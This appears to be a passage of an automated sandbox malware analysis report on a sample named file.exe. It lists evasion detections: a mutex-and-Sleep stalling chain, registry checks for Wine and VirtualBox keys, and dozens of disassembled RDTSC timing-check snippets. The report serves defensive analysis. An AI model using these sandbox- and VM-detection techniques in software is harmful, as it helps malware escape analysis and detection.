Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Found stalling execution ending in API Sleep call
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14553C4 second address: 14553CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8E55 second address: 15C8E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8E5B second address: 15C8E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8E65 second address: 15C8E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8E6B second address: 15C8E73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C8E73 second address: 15C8EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65997h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9CD8E65998h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C91AF second address: 15C91B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C91B5 second address: 15C91BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C91BD second address: 15C91CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9CD8F21AFBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15C91CD second address: 15C91DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F9CD8E65986h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC2FF second address: 15CC309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9CD8F21AF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC309 second address: 15CC333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F9CD8E65999h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC3F0 second address: 15CC3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC6DB second address: 15CC6FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65993h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d je 00007F9CD8E6598Eh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC6FF second address: 15CC710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F9CD8F21B16h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC710 second address: 15CC734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65998h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC734 second address: 15CC76A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop eax 0x00000007 mov esi, dword ptr [ebp+122D2CF8h] 0x0000000d push 00000003h 0x0000000f mov cx, di 0x00000012 push 00000000h 0x00000014 xor dword ptr [ebp+122D184Dh], ecx 0x0000001a push 00000003h 0x0000001c mov cx, bx 0x0000001f push A42246ECh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9CD8F21AFEh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC76A second address: 15CC774 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC774 second address: 15CC77A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC77A second address: 15CC77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15CC77E second address: 15CC7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 642246ECh 0x0000000f mov esi, dword ptr [ebp+122D2A20h] 0x00000015 lea ebx, dword ptr [ebp+1244B1B6h] 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9CD8F21B06h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15ECA91 second address: 15ECA9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15ECA9B second address: 15ECAA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15ECAA1 second address: 15ECAAF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EA915 second address: 15EA93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F9CD8F21B08h 0x0000000c jbe 00007F9CD8F21AF6h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EABFA second address: 15EAC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAC00 second address: 15EAC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAD2F second address: 15EAD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EAE9D second address: 15EAEC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9CD8F21B00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F9CD8F21AFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB5FA second address: 15EB5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB768 second address: 15EB770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB770 second address: 15EB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB8FF second address: 15EB903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB903 second address: 15EB912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9CD8E65986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15EB912 second address: 15EB918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15DFA57 second address: 15DFA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1467 second address: 15F1483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1483 second address: 15F14A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9CD8E65990h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1967 second address: 15F196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F196C second address: 15F198A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F9CD8E65986h 0x00000009 jg 00007F9CD8E65986h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jnl 00007F9CD8E65986h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F198A second address: 15F198F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AC4 second address: 15F1AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E6598Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AD3 second address: 15F1AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9CD8F21AF6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F9CD8F21AF6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AEE second address: 15F1AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F1AF2 second address: 15F1B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f jne 00007F9CD8F21AF6h 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F02A9 second address: 15F02AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F02AF second address: 15F02B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B61D2 second address: 15B61EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65992h 0x00000007 js 00007F9CD8E65986h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B61EE second address: 15B6207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B05h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7E85 second address: 15B7EA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65995h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7EA4 second address: 15B7EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15B7EA8 second address: 15B7EBC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e ja 00007F9CD8E65986h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90CE second address: 15F90D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90D4 second address: 15F90D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90D8 second address: 15F90DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F90DE second address: 15F90E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8A0 second address: 15FB8B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8B9 second address: 15FB8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FB8BF second address: 15FB8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD16E second address: 15FD1C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8E6598Bh 0x00000008 jmp 00007F9CD8E65993h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 mov esi, dword ptr [ebp+122D2C6Ch] 0x00000019 push 00000000h 0x0000001b jmp 00007F9CD8E65997h 0x00000020 push 00000000h 0x00000022 xor esi, 4F095922h 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jng 00007F9CD8E65986h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1C7 second address: 15FD1CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1CD second address: 15FD1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FD1D3 second address: 15FD202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9CD8F21AFCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FED74 second address: 15FED8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65995h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FED8D second address: 15FEDC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9CD8F21B02h 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D3226h], ebx 0x00000015 push 00000000h 0x00000017 mov edi, 6E5F357Fh 0x0000001c push 00000000h 0x0000001e mov edi, ecx 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 jnp 00007F9CD8F21AF6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF831 second address: 15FF8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9CD8E6598Ah 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F9CD8E65988h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F9CD8E6598Bh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F9CD8E65988h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d add dword ptr [ebp+122D32CAh], edi 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push esi 0x00000058 pop esi 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5EA second address: 15FF5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5EF second address: 15FF5F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15FF5F4 second address: 15FF5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1600FAE second address: 160101E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F9CD8E6598Bh 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 and esi, dword ptr [ebp+1245BF96h] 0x00000016 mov di, bx 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov dword ptr [ebp+122D2E88h], eax 0x00000022 pop esi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F9CD8E65988h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f mov esi, dword ptr [ebp+122D3282h] 0x00000045 adc esi, 081F3612h 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F9CD8E65994h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160101E second address: 1601024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1604473 second address: 1604487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160229A second address: 16022A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F9CD8F21AF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605533 second address: 1605537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605537 second address: 160553B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16064E7 second address: 16064FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F9CD8E6598Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16064FA second address: 16064FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605779 second address: 1605793 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
